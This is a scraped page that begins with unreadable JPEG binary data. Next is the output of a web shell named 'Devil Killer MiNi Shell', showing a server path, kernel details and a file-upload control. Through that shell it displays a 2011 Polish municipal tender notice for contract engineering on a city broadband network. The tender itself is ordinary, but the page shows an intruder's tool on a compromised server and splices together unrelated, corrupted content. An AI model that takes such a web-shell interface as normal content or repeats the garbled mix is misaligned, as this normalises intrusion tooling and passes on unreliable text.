JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111202/409500-N-2011.html

<p class="kh_header"><b>Dąbrowa Górnicza: Pełnienie funkcji Inżyniera Kontraktu oraz sprawowania nadzoru inwestorskiego w ramach przedsięwzięcia pn.: Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, w tym: etap I, etap II, etap III</b><br>
<b>Numer ogłoszenia: 409500 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu oraz sprawowania nadzoru inwestorskiego w ramach przedsięwzięcia pn.: Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, w tym: etap I, etap II, etap III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia prowadzone jest w trybie przetargu nieograniczonego 
na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010r. , Nr 113, poz. 759 z późn. zm.) o wartości zamówienia poniżej 193.000,00 EUR.
         
1. Przedmiot niniejszego zamówienia obejmuje pełnienie funkcji Inżyniera Kontraktu oraz sprawowanie nadzoru inwestorskiego w ramach projektu współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013, działanie 2.1 Rozwój Infrastruktury Społeczeństwa Informacyjnego pn.: Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, oraz świadczenie kompleksowych usług doradczych dla Urzędu Miejskiego w Dąbrowie Górniczej.
Projekt ten składa się z trzech etapów:
- Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, etap I
- Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, etap II
- Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, etap III - budowa hot-spotów, 
Projekt zakłada budowę Miejskiej Sieci Szerokopasmowej w Dąbrowie Górniczej etap I oraz etap II wraz z siecią 23 hot-spotów - etap III.
2. Zakres rzeczowy poszczególnych etapów projektu obejmuje:
Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, etap I
1.	Dofinansowany w ramach Programu Rozwoju Subregionu Centralnego Województwa Śląskiego działanie 2.1 Infrastruktura Społeczeństwa Informacyjnego  - procedura pozakonkursowa. Etap I posiada przygotowany projekt budowlany i wykonawczy oraz podpisaną umowa o dofinansowanie. 
2.	Zakres rzeczowy:
2.1	długość wybudowanej sieci - około 32,7 [km],
2.2	liczba punktów dostępowych w jednostkach publicznych - 49 [szt.],
2.3	liczba nowych węzłów sieci szkieletowej wraz z dostosowaniem pomieszczeń - 6 [szt.],
2.4	liczba uruchomionych urządzeń dostępowych - 4 [szt.],
2.5	liczba uruchomionych serwerów - 3 [szt.].
2.6	liczba wdrożonych systemów bezpieczeństwa sieci - 1 [szt.],
2.7	liczba uruchomionych centrów zarządzania siecią (w tym dostosowanie pomieszczeń) - 1 [szt.],

Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, etap II
1.	Dofinansowany w ramach Programu Rozwoju Subregionu Centralnego Województwa Śląskiego działanie 2.1 Infrastruktura Społeczeństwa Informacyjnego  - procedura pozakonkursowa. Etap II posiada zabezpieczone dofinansowanie Uchwałą Zarządu Subregionu Centralnego oraz przygotowany projekt budowlany i wykonawczy.
2.	Zakres rzeczowy:
2.1	długość wybudowanej sieci - około 20,2 [km],
2.2	liczba punktów dostępowych sieci w jednostkach publicznych - 14 [szt.],
2.3	liczba uruchomionych urządzeń dostępowych - 2 [szt.],
2.4	liczba uruchomionych Publicznych Punktów Dostępu do Internetu (PIAP) w postaci punktów HotSpot WiFi - 1 [szt.]. 

Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, etap III - budowa hot-spotów
1.	Dofinansowany w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013 działanie 2.1 Infrastruktura Społeczeństwa Informacyjnego - procedura konkursowa. Etap III znajduje się po pozytywnej ocenie formalnej i znajduje się w trakcie oceny merytorycznej jest realizowany w oparciu o Program Funkcjonalno-Użytkowy.
2.	Zakres:
2.1	liczba uruchomionych Publicznych Punktów Dostępu do Internetu (PIAP) w postaci punktów HotSpot WiFi - 23 [szt.]. 
Punkty te zostaną uruchomione w oparciu sieć wybudowaną w etapach I i II. W ramach PFU przewidziano również uruchomienie centralnego systemu zarządzania HotSpotami wraz z systemem kontroli dostępu i filtrowania ruchu.

3. Wykonawca będzie świadczył kompleksowe usługi doradcze we wszystkich etapach i podetapach realizacji Projektu, począwszy od analizy dostarczonych materiałów źródłowych, uczestniczeniu w prowadzeniu postępowań na wybór m.in. Wykonawców, przez wsparcie Zamawiającego podczas kontroli procesów projektowania i budowy, aż do odbioru końcowego wraz z bieżącym kontrolowaniem procesów monitorowania i rozliczania środków finansowych UE.

4. Przedmiot pełnienie funkcji Inżyniera Kontraktu oraz sprawowania nadzoru inwestorskiego obejmuje następujące podetapy w ramach trzech głównych faz zarządzania projektem:

Faza I - Przygotowawcza, na który składają się:
1.	Opracowanie szczegółowej metodyki zarządzania Projektem obejmującej zapewnienie stałego nadzoru i kontroli nad projektem oraz jego realizacją, opracowanie procedur zarządzania projektem, komunikacji, raportowania, zarządzania ryzykiem i odbiorów wg Metodyki Prince2 lub równoważnej.
2.	Audyt dokumentacji wykonanej na etapie przygotowawczym realizacji Projektu, 
3.	Współpraca z zamawiającym przy opracowaniu dokumentacji dla postępowań o udzielenie zamówień publicznych niezbędnych do realizacji Projektu:
a)	wykonanie robót budowlanych,
b)	dostawę i instalację urządzeń dla sieci telekomunikacyjnej;
c)	utworzenia centrum zarządzania siecią;
d)	promocję projektu;
e)	wyłonienie operatora infrastruktury dla wybudowanej infrastruktury teleinformatycznej.

Faza II - Uczestniczenie w prowadzeniu postępowań wyboru wykonawców robót budowlanych, usług i dostaw w trybie przewidzianym prawem zamówień publicznych.

Faza III - Nadzór nad wykonaniem sieci szkieletowej, na który składają się nadzór nad wykonaniem sieci szkieletowej, w tym budowa linii światłowodowej, budowa węzłów, wyposażenie węzłów oraz przekazanie infrastruktury do użytkowania operatorowi infrastruktury.

Faza IV - Rozliczenie końcowe, na który składa się dokonanie rozliczenia końcowego inwestycji z uwzględnieniem rozliczenia i przekazania środków trwałych zgodnie z wytycznymi dla projektów realizowanych z Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013.

5. Szczegółowy zakres zamówienia
1.	Opracowanie szczegółowej metodyki zarządzania projektem obejmującej zapewnienie stałego nadzoru i kontroli nad projektem oraz jego realizacją, opracowanie procedur zarządzania projektem, komunikacji, raportowania, zarządzania ryzykiem i odbiorów, w tym:
a)	opracowanie wzorów dokumentów wykorzystywanych w trakcie realizacji Projektu, w tym sprawozdań i protokołów odbioru;
b)	 opracowanie modelu organizacji i zarządzania Projektem. W szczególności model ten powinien obejmować zarządzanie na dwóch poziomach: I poziom - komitet sterujący z udziałem Zamawiającego odpowiedzialny za podejmowanie kluczowych decyzji w realizacji Projektu, II poziom - zespoły dziedzinowe: budowlany, telekomunikacyjny, prawny i zamówień publicznych, ds. rozliczenia Projektu. II poziom zarządzania nie powinien przewidywać udziału Zamawiającego;
c)	określenie sposobu jego funkcjonowania oraz wymogów związanych z wdrożeniem;
d)	wdrażania rozwiązań teleinformatycznych w ramach Projektu;
e)	identyfikacji obszarów problemowych i ryzykownych w implementacji Projektu oraz zaplanowanie środków zaradczych.
2.	Aktualizacja dokumentacji aplikacyjnej dla projektu ze względu na aktualny stan prawny i faktyczny.
3.	Bieżące zarządzanie Projektem i doradzanie Zamawiającemu w zakresie:
a)	organizacji i zarządzania Projektem;
b)	sposobu jego funkcjonowania oraz wymogów związanych z wdrożeniem;
c)	wdrażania rozwiązań teleinformatycznych w ramach Projektu;
d)	identyfikacji obszarów problemowych i ryzykownych w implementacji Projektu, oraz zaplanowanie środków zaradczych.
4.	Reprezentowanie Zamawiającego w kontaktach z instytucjami, urzędami oraz innymi podmiotami w sprawach związanych z Projektem na podstawie udzielonych przez Zamawiającego pełnomocnictw.
5.	Weryfikacja dokumentacji projektowo - kosztorysowej dot. realizacji Projektu.
6.	Sporządzanie raportów (sprawozdań) z postępów realizacji Projektu oraz postępów pracy Inżyniera Kontraktu z uwzględnieniem każdego obszaru inwestycyjnego:
a)	miesięcznych - opracowywanych do 5 dnia miesiąca po zakończeniu miesiąca objętego raportem;
b)	rocznych - opracowywanych do 15 dnia stycznia po zakończeniu każdego roku kalendarzowego;
c)	końcowego - opracowywanych dla każdego z obszarów inwestycyjnych w terminie do 15 dni od zakończenia robót budowlanych, instalacji urządzeń aktywnych sieci i innych usług w ramach danego obszaru inwestycyjnego.
7.	Monitoring postępów w realizacji Projektu zgodnie z zweryfikowaną dokumentacją, zatwierdzonymi harmonogramami realizacji zadań i robót oraz raportami Inspektorów Nadzoru.
8.	Sprawdzanie i uaktualnianie harmonogramów realizacji Projektu.
9.	Kontrolowanie przepływów finansowych zgodnie z harmonogramem zadań i robót.
10.	Realizacja zadań w zakresie rozliczenia finansowego i sprawozdawczości dla Projektu z Instytucją Zarządzającą zgodnie z wytycznymi dla projektów realizowanych w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013.:
a)	analizowanie i opiniowanie harmonogramów rzeczowo-finansowych realizacji Projektu opracowanych przez wykonawców robót budowlanych, dostaw i usług, a w przypadkach koniecznych dokonanie ich aktualizacji, w konsultacji z tymi wykonawcami a następnie rekomendowanie Zamawiającemu harmonogramu do akceptacji;
b)	opracowanie harmonogramu płatności dla Instytucji Zarządzającej oraz Zamawiającego, rekomendowanego Zamawiającemu do akceptacji;
c)	opracowanie formularzy wniosków o płatność wraz z przygotowaniem niezbędnych załączników, w celu rozliczenia wydatków w ramach Projektu oraz uzyskania zaliczek dofinansowania, zgodnie z terminami zapisanymi w harmonogramie płatności;
d)	opracowanie wniosku o płatność końcową w terminie do 15 dni od dnia zakończenia i odbioru końcowego wszystkich robót budowlanych, dostaw i usług składających się na realizacje Projektu;
e)	sporządzanie raportów z przebiegu realizacji inwestycji zgodnie z procedurą obowiązującą przy realizacji inwestycji w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013.
11.	Przeprowadzanie wiążących uzgodnień sposobu postępowania w przypadku konieczności wykonania zamówień dodatkowych (w uzgodnieniu z Zamawiającym).
12.	Wsparcie Zamawiającego w procedurze odbioru od wykonawców robót budowlanych, dostaw i usług oraz przygotowanie rozliczeń wykonanych prac wraz z koniecznymi do rozliczenia załącznikami. Odbiory końcowe wykonania robót budowlanych, usług i dostaw skutkujące powstaniem zobowiązania finansowego wymagają udziału w tych odbiorach przedstawiciela Zamawiającego. W tym przypadku Inżynier Kontraktu rekomenduje dokonanie odbioru w oparciu o zebraną dokumentację.
13.	Współpracę z przedstawicielami Zamawiającego w zakresie rozliczeń Projektu i dostarczanie wszystkich niezbędnych dokumentów dotyczących tych rozliczeń.
14.	Dokonanie rozliczenia końcowego Projektu z uwzględnieniem rozliczenia i przekazania środków trwałych, zgodnie z wytycznymi dla projektów realizowanych w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013.
15.	Wsparcie Zamawiającego w zakresie realizowanych w ramach projektu postępowań o udzielenie zamówień publicznych, w szczególności na:
a)	wykonanie robót budowlanych,
b)	dostawę i instalację urządzeń dla sieci telekomunikacyjnej;
c)	utworzenie centrum zarządzania siecią;
d)	promocję projektu;
e)	wyłonienie operatora infrastruktury dla wybudowanej infrastruktury teleinformatycznej.
              Zakres wsparcia obejmuje w szczególności:
1)	opracowania wniosku o wszczęcie postępowania zgodnie z Zarządzeniem Prezydenta w sprawie zmian w Regulaminie funkcjonowania zamówień publicznych oraz zamówień, których wartość nie przekracza wyrażonej w złotych równowartości kwoty 14 000 euro w Urzędzie Miejskim w Dąbrowie Górniczej nadanym Zarządzeniem Nr 1325/08 Prezydenta Miasta Dąbrowy Górniczej z dnia 04.12.2008r. w sprawie: Regulaminu funkcjonowania zamówień publicznych oraz zamówień, których wartość nie przekracza wyrażonej w złotych równowartości kwoty 14 000 euro w Urzędzie Miejskim w Dąbrowie Górniczej (http://www.bip.dabrowa-gornicza.pl/BIP.aspx?Sel=5861&ident=42228) oraz ustawą Prawo Zamówień Publicznych (DZ.U. z 2010 r. nr 113, poz. 759 z późn. zm. ), a w tym:
a)	wyboru trybu postępowania,
b)	właściwego określenia przedmiotu zamówienia pod względem zgodności z zasadami określonymi prawem zamówień publicznych, 
c)	właściwego określenia warunków udziału w postępowaniu w sposób nienaruszający zasady równego traktowania wykonawców oraz uczciwej konkurencji, a jednocześnie pozwalający na wyłonienie kręgu wykonawców dających rękojmię prawidłowego wykonania przedmiotu zamówienia,
d)	właściwego określenia kryteriów oceny ofert aby przy możliwie jak najlepszym bilansie ceny i innych kryteriów odnoszących się do przedmiotu zamówienia możliwy był wybór oferty najkorzystniejszej,
e)	sporządzenia projektu (wzoru) umowy w sprawie zamówienia publicznego,
2)	uczestnictwo w pracach komisji przetargowej
3)	czynności podejmowanych przez Zamawiającego w toku postępowania, a w tym:
a)	opracowanie odpowiedzi na wnioski wykonawców o wyjaśnienia treści SIWZ w zakresie formalno-prawnym 
b)	przygotowanie odpowiedzi/stanowiska Zamawiającego na okoliczność złożenia przez Wykonawców informacji w trybie art. 181 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, (Dz.U. 2010 Nr. 113, poz. 759 z późn. zm.) o niezgodnej z przepisami ustawy czynności podjętej przez Zamawiającego lub zaniechaniu czynności, do której Zamawiający był zobowiązany
c)	wskazanie możliwych działań w zakresie postępowania odwoławczego, przygotowanie odpowiedzi/stanowiska Zamawiającego na okoliczność wniesienia przez Wykonawców odwołania w trybie art. 180 ustawy PZP wraz z reprezentacją Zamawiającego przed Krajowa Izbą Odwoławczą 
d)	rozstrzyganie innych problemów prawnych pojawiających się w toku postępowania oraz przygotowanie pism i decyzji w tym zakresie,
16.	Pełnienie nadzoru budowlanego zgodnie z obowiązującym polskim Prawem budowlanym - pełnienie obowiązków przez Inspektorów Nadzoru wszystkich branż występujących na niniejszym zadaniu zgodnie z ustawą Prawo budowlane, obowiązującymi przepisami, polskimi normami i zasadami wiedzy technicznej. Obowiązki i prawa inspektora nadzoru wynikają z art.25-27 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2006 r. Nr 156, poz. 1118 z późniejszymi zmianami).
17.	Współpracę z pozostałymi doradcami Zamawiającego, świadczącymi inne usługi doradcze związane z realizacją Projektu.
18.	Obsługa prawna Zamawiającego w zakresie realizacji przedmiotowego Projektu w szczególności dotycząca prawa budowlanego, prawa własności, prawa koncesyjnego na roboty budowlane i usługi, partnerstwa publiczno - prywatnego oraz przedstawicielstwa procesowego.
19.	Zorganizowanie i prowadzenie Biura Inżyniera Kontraktu na terenie miasta Dąbrowa Górnicza  lub gmin sąsiednich.
20.	Ocenę zgodności robót z dokumentacją projektową.
21.	Ocenę postępu robót w stosunku do założonego harmonogramu rzeczowo-finansowego wykonawców robót oraz harmonogramu realizacji zadań i robót na podstawie raportów Inspektorów Nadzoru.
22.	Wydawanie opinii, zgody, akceptacji i wniosków na piśmie wg wzorów ustalonych w opracowanej szczegółowej metodyce zarządzania Projektem Jednocześnie prowadzenie wszelkich niezbędnych sprawozdań i raportów.
23.	Wnioskowanie:
a)	w sprawie wprowadzenia niezbędnych zmian w dokumentacji technicznej i uzyskania zgody na zmiany;
b)	o uzyskanie od projektanta wyjaśnień wątpliwości dotyczących dokumentacji projektowej i zawartych w niej rozwiązań.
24.	Poświadczanie terminu zakończenia robót.
25.	Dopilnowanie zabezpieczenia przez wykonawcę robót budowlanych terenu budowy w przypadku wypowiedzenia umowy.
26.	Rozliczanie zrealizowanego zakresu projektu, w szczególności zakresu robót budowlanych, w przypadku przerwania jego realizacji przez wykonawcę.
27.	Dokonywanie czynności związanych z przygotowaniem inwestycji do odbioru i przekazania jej w użytkowanie zgodnie przepisami prawa.
28.	Uczestniczenie w kontrolach przeprowadzanych przez Nadzór Budowlany i inne organy uprawnione do kontroli oraz dopilnowanie realizacji ustaleń i decyzji podjętych podczas kontroli.
29.	Przygotowanie oceny technicznej zrealizowanego projektu.
30.	Nadzór nad realizacją warunków ustalonych w decyzji o pozwoleniu na budowę oraz w decyzjach i uzgodnieniach opiniujących realizację inwestycji.
31.	Udzielanie regularnych konsultacji i doradztwa technicznego Zamawiającemu.
32.	Zarządzanie wdrożeniem oraz procesem przekazania sieci teleinformatycznej do użytkowania.
33.	Weryfikacja dokumentacji powykonawczej ze stanem faktycznym.
34.	Przedkładanie Zamawiającemu wszystkich raportów, oświadczeń i zapytań dostarczonych przez Wykonawcę robót budowlanych.
35.	Udział i obsługa administracyjna narad technicznych.
36.	Ocena, aprobata lub odrzucenie wniosków Wykonawcy robót.
37.	Wykonawca winien zagwarantować obecność personelu na budowie w sposób zapewniający ciągły nadzór i możliwość bezpośredniego kontaktu z Zamawiającym.  
38.	Koordynacja robót z innymi inwestycjami prowadzonymi na obszarze objętym projektem oraz podpisywanie w tym zakresie korespondencji. 
6.	Na  przedmiot niniejszego zamówienia ustala się okres gwarancji jakości, który wynosi 3
lata i liczony jest od zakończenia realizacji Umowy tj. od dnia podpisania przez Zamawiającego Protokołu Odbioru Końcowego. Okres gwarancyjny nie zostanie uznany za zakończony, dopóki nie zostaną 
usunięte przez Wykonawcę wady i usterki zgłoszone do czasu upływu terminu gwarancyjnego oraz nie wygaśnie  bieg gwarancji zgodnie z art. 581 par. 1 KC, a potwierdzeniem zakończenia będzie podpisany przez obie strony protokół odbioru pogwarancyjnego. Zamawiający może dochodzić roszczeń z tytułu gwarancji za wady i usterki także po upływie terminu gwarancji, jeżeli zgłosi wadę przed upływem tego terminu.
7.  W okresie gwarancyjnym Wykonawca będzie zobowiązany do:
1.1	nadzoru nad usuwaniem wad i usterek powstałych w okresie gwarancyjnym, których usunięcie potwierdzone zostanie protokołem usunięcia wad/usterek,	
1.2	dokonywania przeglądów gwarancyjnych z udziałem Zamawiającego,
1.3	usunięcia stwierdzonych przez Zamawiającego nieprawidłowości w rozliczeniu zadania.
8. Okres rękojmi jest równy okresowi gwarancji.
9. Wykonawca zobowiązany jest w okresie realizacji przedmiotu umowy posiadać aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 500.000,00 zł (słownie: pięćset tysięcy złotych). Wykonawca utrzyma ważność ubezpieczenia przez cały okres realizacji Umowy. Nie później niż w ostatnim dniu ważności ubezpieczenia Wykonawca przedstawi Zamawiającemu kopię polisy o przedłużonym terminie ważności. Wykonawca zobowiązany jest do posiadania nieprzerwanej ochrony ubezpieczeniowej w okresie obowiązywania umowy, na warunkach nie gorszych niż w pierwotnej polisie.
10. Szczegółowa dokumentacja projektowa, aktualna na dzień ogłoszenia postępowania stanowi załącznik nr 7 do SIWZ i została udostępniona wyłącznie na potrzeby ustalenia zakresu planowanej inwestycji dla celów niniejszego postępowania. Dokumentacja projektowa może ulec zmianom, zaś Inżynier Kontraktu zobowiązany jest do stosowania się każdorazowo do aktualnej wersji dokumentacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4, 71.52.00.00-9, 71.54.00.00-5, 71.31.80.00-0, 71.63.00.00-3, 79.11.10.00-5, 79.13.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.05.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 
            10 000, 00  zł (słownie: dziesięć tysięcy złotych) w formach określonych w art. 45 ust. 6 Ustawy.
 2.   Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego:
Getin Noble Bank S.A. - konto nr 74 1560 1010 0000 9480 0001 1847 
 3. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym                            
             z uwzględnieniem art. 46 ust.4 Ustawy. 
             Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną przez Wykonawcę.

4.	W przypadku wyboru formy niepieniężnej wadium, oryginał dokumentu należy złożyć w Wydziale
Księgowo-Budżetowym Urzędu Miejskiego w Dąbrowie Górniczej ul. Graniczna pokój nr 320, III 
 piętro. Do oferty należy dołączyć kserokopię złożonego dokumentu. Wadium wnoszone w formie   innej niż w pieniądzu musi spełniać wymagania wynikające z ustawy, w szczególności określać bezwarunkowy, nieodwołalny obowiązek zapłaty na pierwsze żądanie zamawiającego, w przypadkach określonych w ustawie oraz być ważne przez okres związania ofertą, określony w niniejszej specyfikacji.
5.   Zwrot wadium - zgodnie z art. 46 ust. 1, 1a, 2 i 4  Ustawy.
6.   Zatrzymanie wadium - zgodnie z art. 46 ust. 4a i 46 ust. 5 Ustawy.
7. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono 
             wadium na podstawie art. 46 ust. 1 Ustawy, jeżeli w wyniku rozstrzygnięcia odwołania 
     	       	jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie                  		określonym przez Zamawiającego.
8.  Wykonawcy, którzy nie wniosą wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust.3 Ustawy, albo nie zgodzili się na 
przedłużenie okresu związania ofertą zostaną wykluczeni z postępowania (art. 24 ust. 2 pkt. 2    
Ustawy).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
